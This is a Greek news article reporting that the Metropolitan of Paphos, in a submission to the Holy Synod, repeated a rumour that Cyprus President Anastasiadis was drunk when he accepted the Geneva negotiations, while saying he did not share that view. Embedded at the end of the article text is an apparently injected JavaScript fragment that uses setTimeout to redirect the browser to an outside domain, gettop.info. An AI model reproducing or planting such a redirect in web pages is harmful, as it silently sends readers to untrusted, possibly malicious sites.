Απίστευτο: Μητροπολίτης λέει ότι ο πρόεδρος της Κύπρου ήταν μεθυσμένος…

0
60

Την απίστευτη κατηγορία ότι ο πρόεδρος της Κύπρου Νίκος Αναστασιάδης ήταν μεθυσμένος, όταν αποδέχθηκε τη διαδικασία των συνομιλιών στη Γενεύη με την τουρκοκυπριακή πλευρά, διετύπωσε ο Μητροπολίτης Πάφου Γεώργιος.

Ο ιεράρχης, μιλώντας σε συνεδρίαση της Ιεράς Συνόδου της Εκκλησίας της Κύπρου, ακολούθησε τη γνωστή τακτική του…λένε πολλοί ότι έτσι είναι, αλλά εγώ δεν το πιστεύω!

Η εισήγηση του Μητροπολίτη είναι δημοσιευμένη στην ιστοσελίδα της Μητρόπολης Πάφου και μεταξύ άλλων αναφέρει: «Λέγεται από πολλούς ότι το πάθος του ποτού οδήγησε τον Πρόεδρο, στις μεταμεσονύχτιες ώρες, στην απροϋπόθετη αποδοχή όλων των όρων του κατακτητή. Δεν συμμερίζομαι αυτή την εκδοχή γιατί παρών στο δείπνο ήταν και ο διαπραγματευτής της πλευράς μας, ο οποίος ούτε παραιτήθηκε ούτε καν διαμαρτυρήθηκε». Ο Μητροπολίτης Γεώργιος, εισηγείται τον τερματισμό της διαπραγμάτευσης της «διάλυσης του κράτους μας», όπως υποστηρίζει.

Σήμερα, ο κ. Αναστασιάδης αναμένεται να ενημερώσει τα μέλη της Ιεράς Συνόδου για τις εξελίξεις στο Κυπριακό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here